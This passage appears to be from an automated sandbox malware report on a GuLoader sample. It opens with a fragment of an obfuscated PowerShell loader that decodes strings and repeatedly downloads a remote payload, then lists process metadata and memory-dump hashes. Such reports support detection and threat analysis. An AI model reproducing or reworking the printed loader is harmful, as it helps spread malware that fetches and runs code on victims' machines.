rd w op';$Sterne=Tilbageholdte 'Bi>';$Murage=Tilbageholdte 'BeiEaEFrX';$Svejsemestre='Teddybjrnenes';$Groteskes='\bethink.Sal';Containeriseringers (Tilbageholdte 'K.$FogUdl iO.eBRoA,mlk,:SeeCaN HERiB rrH rChi SCuEDiNAleH SSa=Af$ .EflnTrv I: Fa uPAnp D.eAMet aKr+S,$Kng cR,doK tRuE oSReK E.as');Containeriseringers (Tilbageholdte 'Sc$Ovg .LTho ,b EAVrlSa:VilUnA,nGRer CI.rn.pg SsArFBlO TRS M .3Re7Go=E $ .A.juFlt O oM hA eTLaT.oeThoc R PiSpeFoN rS A.KlsN pUnL ri STHo(Sl$PesJeT EArRG N yEMu)');Containeriseringers (Tilbageholdte $Ungeneral);$Automatteoriens=$Lagringsform37[0];$Bygders=(Tilbageholdte ' P$brgT lS O Sb.uAC L : PbAmIS,RSkGBoiSpTQuTH iHjN MERarFrE BnSks .=F.NFieF wSt-SmoPeBGyj BeHocK,T US.nyJoSStt GER M K.l $Sap DlBiaL.g eCoN');Containeriseringers ($Bygders);Containeriseringers (Tilbageholdte '.o$PrBPeiCorD gPri FtJ.t .i Sn heSorEreannKus i.OrHudeAraMid,eeRarKosCa[Po$StRHeeG.tSar Oa,inSrsShfK.oF rPrmS ]Fa=Gr$JeMSto EoOvnPas,dcKua gpSie');$Netmave=Tilbageholdte ' S$ .BGoiF.rReg,ai at Dt si ,nn e MrS eHjns,s . 
.DBooFlwB nudl OoLraPedcaFB itrlc e H(Dr$AaA au NtProUnmSeaMittotS eDioKor iReeAnnA,sri, $ VIHunMadDioIrpAth yeOrnUni CnEp)';$Indophenin=$Enebrrisenes;Containeriseringers (Tilbageholdte 'T $,nGM.lstOFeB cA.oL E:InI dnFuGGoET f MR DM iAB.RSpmCoEf LAfaB DGeE o= F(.yt Ee aSBat f-AtP,aa ,t ah i y$UnI KnChd .O ,pUnHUdE ,n Ki ,nBe)');while (!$Ingefrmarmelade) {Containeriseringers (Tilbageholdte ' e$ ig slBuoBrbSpa AlBl:M DfieDonNonLoiUnsBusmo=Se$FoTreoA k.eo tmTrpUmoT.nPaeBenVktEne es') ;Containeriseringers $Netmave;Containeriseringers (Tilbageholdte ' ,sSaTFaaAvRUftTi- s gl.aEPeeBiPPl oo4');Containeriseringers (Tilbageholdte 'Ud$ aGRiL .oNabTyA olAn:BeI NnUrGd Eb f eR SMVgA prB mutE,el,oa DDiEB =K.(G TOmESkSbrt .- apBrA iTQuh , ,$ dIslN BDVao rpLyhOxeP nw iPln u)') ;Containeriseringers (Tilbageholdte 'F.$AfgPelCloL bSpaS,LE :LoFP,oBor HfA jU,ETir SDG iGuNS,GAce arBa=Gr$JyG olCooA b .ALvLM : oPWao SI GnFiTD,w.eaG yStS ,+ X+ e%I $HoLPra GG dRM iPoN uGTes.rF WO hrunMB 3 l7Wo.UnC lOKnUUfn Kt') ;$Automatteoriens=$Lagringsform37[$Forfjerdinger]}$Agrees=317274;$Unanalytic=28672;Containeriseringers (Tilbageholdte 'W $GaGStlTeo rbMyA.il n:,dS atPrRVeA AIEjnDiS . Un=,c TgFeEC T c-,oC TO,aN,aTSeeToN .TYa Ve$PaIFiN PDTrO UpS H ESknHyIEnN');Containeriseringers (Tilbageholdte 'Ra$ cgLil aoStbm a DlBa:Unl CuOvfVbtDuaScn,egSur e UbSesRe i= F C [EkS yT.sFitSleVamAf.DiCBeo Un vF.e MrRytW ]Un:Fe:D FTor aoP,m,eBK,aThs Cepl6Pl4.rSdit TrW,iSunuogS (,k$ iSBatWrr aGriHenS s B)');Containeriseringers (Tilbageholdte 'On$ AgEvLFoOTrbHea lSu: eT nS,oPlm ,A BNIrI oa,a El= S N [.rS oyCos itStEEvMMi.,rT peunXBlT f.n ECaN c Go ADScISpN.ogPi]In:H.:Spa Rs CCStiOciEm.IngdiEIsTI sSutParAniklnReGun(Uf$OvLPruVoF AtAmapanTaGYarNge ibIdS ,)');Containeriseringers (Tilbageholdte ' I$ OGUnlPaOTibA a AlEk:F a ocHaOOpRS N ,S.k= S$KieRun ,O SM,pa Ln II ha s.MosS,UReb SVatBaRVai Dn Ug,a(Mo$ oaGaG,rr OEMuE.is , B$S U nkuAHan SaStLS y LTDeiFoCB,)');Containeriseringers $Acorns;"
                                                    Imagebase:0x60000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000006.00000002.2982475542.0000000005748000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:7
                                                    Start time:13:27:11
                                                    Start date:08/12/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7699e0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7fb59c527b2a1704a6211642a89c0f6641e4c1260ccfc6419cc44108e6c1fd11
                                                      • Instruction ID: 330652ada3e1e3551e9f9469c8fc70330c89e05e88cf820cbf03bd767c6e46bd
                                                      • Opcode Fuzzy Hash: 7fb59c527b2a1704a6211642a89c0f6641e4c1260ccfc6419cc44108e6c1fd11
                                                      • Instruction Fuzzy Hash: EA410772B0EA8D4FEBA5EEA844A46A877E1FF94354B0501BBD45DC75E3DA14AC04C341
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0698834b0c6f94917f0ffdb30c63124ff6a36144404f3cc0de5c655ad5f80438
                                                      • Instruction ID: 0e546d42d5c47489842d2bdedc153180d720162a3fba2c6f7a4dde5a5edbd226
                                                      • Opcode Fuzzy Hash: 0698834b0c6f94917f0ffdb30c63124ff6a36144404f3cc0de5c655ad5f80438
                                                      • Instruction Fuzzy Hash: E5310423F1FA8A0BE7B696A918B55787AC0FF11328B6A01BAD55DC35E3DD086C014241
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9200416bf4fcaee84c1757128f18536913710848ba0733188976b60947cd6d7
                                                      • Instruction ID: 03d8af8051c6d44e94cb561888e704118a88461a02fda65b2a204526cce6126d
                                                      • Opcode Fuzzy Hash: d9200416bf4fcaee84c1757128f18536913710848ba0733188976b60947cd6d7
                                                      • Instruction Fuzzy Hash: 31212022F0FA4E0FE7B99A6C08B517465C2FF5535875A01BED05EC75E3DD19EC418241
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884112712.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d145d0be3dbb39f875fa6e0ea39195a3812844e4c3de3f32138daf3fcc0d64c7
                                                      • Instruction ID: 7f05b1a7bc642a735906f3854ad4a790db8e82bb1f53672a82f6448c357758a6
                                                      • Opcode Fuzzy Hash: d145d0be3dbb39f875fa6e0ea39195a3812844e4c3de3f32138daf3fcc0d64c7
                                                      • Instruction Fuzzy Hash: CC318330A1964DDEFBB89F54CC6AFF93292FF41318F810139D41D860E2CA792A45CB61
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8df017e8c281c758e9bea735ca032e92348e150b1d19806a7301af9df7738f7
                                                      • Instruction ID: a08ac5b5c8ca839a9fefb6bb0e5bd3bf93022094b550a4a468eb689b4cbb66c0
                                                      • Opcode Fuzzy Hash: e8df017e8c281c758e9bea735ca032e92348e150b1d19806a7301af9df7738f7
                                                      • Instruction Fuzzy Hash: DD21D353E0FACA0FE7A1A67808F51642BD1EF66654B1940FFD09DC71E3DC18A8098322
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3adcf0c3cd541e6b4ab4aff2fca9910c35c9362794e3eb45d4be0229f3158b78
                                                      • Instruction ID: d53b6a3f846075767c5e2f7ce384323f313402f175cdddefcfb90913982a57d7
                                                      • Opcode Fuzzy Hash: 3adcf0c3cd541e6b4ab4aff2fca9910c35c9362794e3eb45d4be0229f3158b78
                                                      • Instruction Fuzzy Hash: FF119832A0E7C94FD765E65888A61ACBBE1FF55224F1401FED09D870E7DA292D448742
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ba3e03a935698ea8eb4392a3624e5567d2486e46fd772439603206463a8c17b2
                                                      • Instruction ID: 997ecf97e51629763ab9798f51968673e1dd8383677b151b538d8db7c09bc036
                                                      • Opcode Fuzzy Hash: ba3e03a935698ea8eb4392a3624e5567d2486e46fd772439603206463a8c17b2
                                                      • Instruction Fuzzy Hash: B311C473A0E7C90FE765EB5848A61ACBBB1FF56224F1501FED09D870E3DA186D448741
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884628386.00007FFD9BB70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9bb70000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b0baac643a1421b9d01540e9ba22c222a3e619b6dcb8557dbc438f73501d3b29
                                                      • Instruction ID: abefbdcee614e51c1b3a9bea3c96b5777e3aadcbbe428a38ac3e38db2b77945a
                                                      • Opcode Fuzzy Hash: b0baac643a1421b9d01540e9ba22c222a3e619b6dcb8557dbc438f73501d3b29
                                                      • Instruction Fuzzy Hash: 3E11C472B0E7C90FE766A65848A61ACBBA1FF52224F0501FED09C8B0E3DA192D448791
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1884112712.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ffd9baa0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction ID: bdda0109228a190c12742b9e7315728e2f6bb354b6803920c3f62299af715007
                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                      • Instruction Fuzzy Hash: 9D01677121CB0C4FD748EF0CE451AA5B7E0FF95364F10056DE58AC76A5D636E881CB45
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2987626670.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_6d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1861941731
                                                      • Opcode ID: b2767ee04c8d930612e45cc6bdedb3a1302ae151af963961c6f7d7d27045a1be
                                                      • Instruction ID: 934c81fb173ba251cc0330dbd3025e217208a382a542cc21eded3423cf289b49
                                                      • Opcode Fuzzy Hash: b2767ee04c8d930612e45cc6bdedb3a1302ae151af963961c6f7d7d27045a1be
                                                      • Instruction Fuzzy Hash: 80927DB0A00218DFDB64DB24C954B9ABBB2FB84304F1184E5D9096B795CB71EEC6CF91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: \VHm
                                                      • API String ID: 0-3272467948
                                                      • Opcode ID: a7c08666782989e12ad4fc8a4befe604a9bdfc43e8bd4dd522cb75ace1f53106
                                                      • Instruction ID: d5adc20e2cebec36303b17668f0a715952904e81fda4d532bde5c1f21cc9a8c2
                                                      • Opcode Fuzzy Hash: a7c08666782989e12ad4fc8a4befe604a9bdfc43e8bd4dd522cb75ace1f53106
                                                      • Instruction Fuzzy Hash: 74B16D71E002098FDB50CFA9D88579DBBF2AF88314F158129E919AB3A4EB749C45CF85
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 800047b417b18e08dd843d3bb5f5040370376febec7daac7c888e057d109d10d
                                                      • Instruction ID: b7bd763984b00684bdb905f96136bfc868dc5fea1b58435ff1738a8b96198b16
                                                      • Opcode Fuzzy Hash: 800047b417b18e08dd843d3bb5f5040370376febec7daac7c888e057d109d10d
                                                      • Instruction Fuzzy Hash: B4B18D70E002098FDF60CFA8D88179DBBF2AF88714F158129D919EB794EB749C85CB85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                      • API String ID: 0-3939933449
                                                      • Opcode ID: b78490b032436a65efb360a4dc0ee3a5780494700ab1f108ffb5a8ee35db1abf
                                                      • Instruction ID: 76d231c249d78d70c0fa27cac125d8f3f37c8c11ee98e5fb674f3692cf5bf550
                                                      • Opcode Fuzzy Hash: b78490b032436a65efb360a4dc0ee3a5780494700ab1f108ffb5a8ee35db1abf
                                                      • Instruction Fuzzy Hash: DE828FB0B00219DFDB14CF58C964BAABBF6BB85304F2485AAD5489F355CF31EC868B51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                      • API String ID: 0-2890353280
                                                      • Opcode ID: 150225864b4693136903b79877b6cb2109929eb69597bc2f96eade89d4277754
                                                      • Instruction ID: 550e981800f942b3bc307fc82e03875bde32dc85073225ca450f88bc7c272645
                                                      • Opcode Fuzzy Hash: 150225864b4693136903b79877b6cb2109929eb69597bc2f96eade89d4277754
                                                      • Instruction Fuzzy Hash: 4892A7B0A00215DFCB24CF58C961BABBBF6EF85304F1485AAD5459B355CB31EC86CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-518715366
                                                      • Opcode ID: 82a84ed79b134247c5ec91e2117a831a9bb5efadcaed98ec34f5701fd6594d38
                                                      • Instruction ID: 2a81199f74dfe3d8639ff19dbaace7b66540d64968322e6c0c2e3773e0b32aa9
                                                      • Opcode Fuzzy Hash: 82a84ed79b134247c5ec91e2117a831a9bb5efadcaed98ec34f5701fd6594d38
                                                      • Instruction Fuzzy Hash: CD524DB4A00219DFDB24CF58C994FAAFBF6BB45304F24819AD948AB355CB31AD42CF51
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2970245596.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_2df0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 8NHm$Hbq$h]Hm$h]Hm$h]Hm$$^q$$^q$IHm
                                                      • API String ID: 0-2014077908
                                                      • Opcode ID: fd76ea5770703b774c89ea8db0a28e73cdc73d010ea646b36d5385d985f2ff8e
                                                      • Instruction ID: eaf2dcce50092fab81814fb1d8075bb03ed1bd4c5cd3a00f148998deefd9759b
                                                      • Opcode Fuzzy Hash: fd76ea5770703b774c89ea8db0a28e73cdc73d010ea646b36d5385d985f2ff8e
                                                      • Instruction Fuzzy Hash: DE228130B002188FCB69DB24C854BAEB7B6EF89744F1580A9D50AAB361DF34DD85CF85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-3865595929
                                                      • Opcode ID: 323bb9db6dbf7eff5b76e8a1ce902baaaf2093bebd26068d500d73b9ea8b94d3
                                                      • Instruction ID: e8f5582f289230b2f0676b76494ffd6b1d719a1ba1fc0d3d74179874260bb4ad
                                                      • Opcode Fuzzy Hash: 323bb9db6dbf7eff5b76e8a1ce902baaaf2093bebd26068d500d73b9ea8b94d3
                                                      • Instruction Fuzzy Hash: B7E15BB1B043159FCB158B6889247EBBBE2AF85310F1584ABD885CF365DA71CC45C7A2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-2822668367
                                                      • Opcode ID: 486aa9c80269102abbebbe2d873c715be3c914a074fe68ce0ae5201ca6ec63e9
                                                      • Instruction ID: 9293ae744d3c293994ddc8ff1d3829758a96eb5194e2c2393a7a8476d809c8ca
                                                      • Opcode Fuzzy Hash: 486aa9c80269102abbebbe2d873c715be3c914a074fe68ce0ae5201ca6ec63e9
                                                      • Instruction Fuzzy Hash: 23D1A1B0A40208DFC714DB68C561B9EBBE2EF84704F11C46AD855AF365CF71EC868BA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2987626670.0000000006D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_6d50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-4202989938
                                                      • Opcode ID: 3fcf1c34e083db2386bc4b6e4df8dab1533d4c41b9ec7341ed8bbccf4f2927cb
                                                      • Instruction ID: a5e16cd4d6af7d45d0e06634acb8d731dacf9d179aa7da4b28a80fd3f4d54a75
                                                      • Opcode Fuzzy Hash: 3fcf1c34e083db2386bc4b6e4df8dab1533d4c41b9ec7341ed8bbccf4f2927cb
                                                      • Instruction Fuzzy Hash: 5F627DB4A40218DFDB24DB24CD54BAABBB2FB84304F1081E5D9196B755CB71AEC2CF91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1420252700
                                                      • Opcode ID: b2a7843c6b41d7000c71e9b468335dd81dfa1b69926901cc0b2753b88648db3b
                                                      • Instruction ID: ebcd5b122fe55b116ebf63826dcbe000a04bdfd2b701de87c190f4f70ba4be9d
                                                      • Opcode Fuzzy Hash: b2a7843c6b41d7000c71e9b468335dd81dfa1b69926901cc0b2753b88648db3b
                                                      • Instruction Fuzzy Hash: 4D727DB4B00204DFC714CBA8C555B9ABBF6BB85304F21C56AD9499B356CB72EC42CF92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1420252700
                                                      • Opcode ID: c584143a39d84b6179f931ac9b41be78459745967b81a508e60f5268f4c044e4
                                                      • Instruction ID: 39479d535bf231f3c49fc33e578c8f649071f5329d3f3a30d52b499d27238d19
                                                      • Opcode Fuzzy Hash: c584143a39d84b6179f931ac9b41be78459745967b81a508e60f5268f4c044e4
                                                      • Instruction Fuzzy Hash: B33280B4B00209EFC714CB98C555B9EBBE2BB85304F15C46AE9459F355CBB2EC82CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q
                                                      • API String ID: 0-1196845430
                                                      • Opcode ID: d8bf5e2c0703ee5b90dbcd0675a3dd772f1b2c78ff73a3a5acf44744e5efb572
                                                      • Instruction ID: 5b3c1588b95497150cc0b63e17fd6f35e94832b6f42ac7cbf47bab2b5f781002
                                                      • Opcode Fuzzy Hash: d8bf5e2c0703ee5b90dbcd0675a3dd772f1b2c78ff73a3a5acf44744e5efb572
                                                      • Instruction Fuzzy Hash: ABB19EB0A00209DFCB14CF54C551BEEBBB2EB84704F15C556D845AF365CB75EC868BA1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: d6491a85a11e21a51129b4d91b0640f5d72e1bf46451617ce0757de93f194a2e
                                                      • Instruction ID: fdf03d6274ff6726491058082b5af0d24452869be88d919e6797356d0b213abc
                                                      • Opcode Fuzzy Hash: d6491a85a11e21a51129b4d91b0640f5d72e1bf46451617ce0757de93f194a2e
                                                      • Instruction Fuzzy Hash: B7628DB4A00204DFDB14CB98C551F9AB7B2FB89304F25C56AD9496B356CB72EC42CF82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: 3762a1c06e978f254a3be5a3e4f11ddbf5f4d5cd5c4f43c2359f25a902b20747
                                                      • Instruction ID: f3e53aebe1502b7345f2021943f4368d538e047b576c9da6f586e92d8e9eb234
                                                      • Opcode Fuzzy Hash: 3762a1c06e978f254a3be5a3e4f11ddbf5f4d5cd5c4f43c2359f25a902b20747
                                                      • Instruction Fuzzy Hash: 7D628EB4A00204DFDB14CB98C551FAAB7B2FB85304F25C56AD9496B356CB72EC42CF92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: d924a89368a40579fdc976e8f0bd009a0977fe65ebee9bba24fe2937407be999
                                                      • Instruction ID: c01fcc5e17b378bbcdafb4a3ce8dadbbd1df431ae2f6a28f7fb4d0a638ae1c4a
                                                      • Opcode Fuzzy Hash: d924a89368a40579fdc976e8f0bd009a0977fe65ebee9bba24fe2937407be999
                                                      • Instruction Fuzzy Hash: 58426EB4A00205DFDB14CB94C551F9ABBB2FB85304F25C56AD9496B356CB72EC42CF82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: 5b963174b1345e0540ffd8a2f58c954369487c6d13186f72ef30cce65658d6be
                                                      • Instruction ID: 368f0a2ebaceb67dd4f316577b29da379048482a39684dc5add3b0dd62926430
                                                      • Opcode Fuzzy Hash: 5b963174b1345e0540ffd8a2f58c954369487c6d13186f72ef30cce65658d6be
                                                      • Instruction Fuzzy Hash: 3D3280B4A00205DFDB14CB94C551FAABBB2FB85344F21C5AAD9495B356CB72EC42CF82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: cd018e7a404589da71341f15386e9e070466e3aa77781b3515da2b1dbe02481a
                                                      • Instruction ID: a18bde77684edb5f246cc711abfab0d295e27b6a43183b68d85b90827a82b306
                                                      • Opcode Fuzzy Hash: cd018e7a404589da71341f15386e9e070466e3aa77781b3515da2b1dbe02481a
                                                      • Instruction Fuzzy Hash: 55227DB4B00205EFDB14CB94C965B9ABBB2FF85304F14845AE9459F355CBB2EC82CB91
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2989851085.00000000074D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_74d0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: d1de5268bdda7cb7860c50ea6c497f9ace4de09db229d88b09bf9792ae0d9901
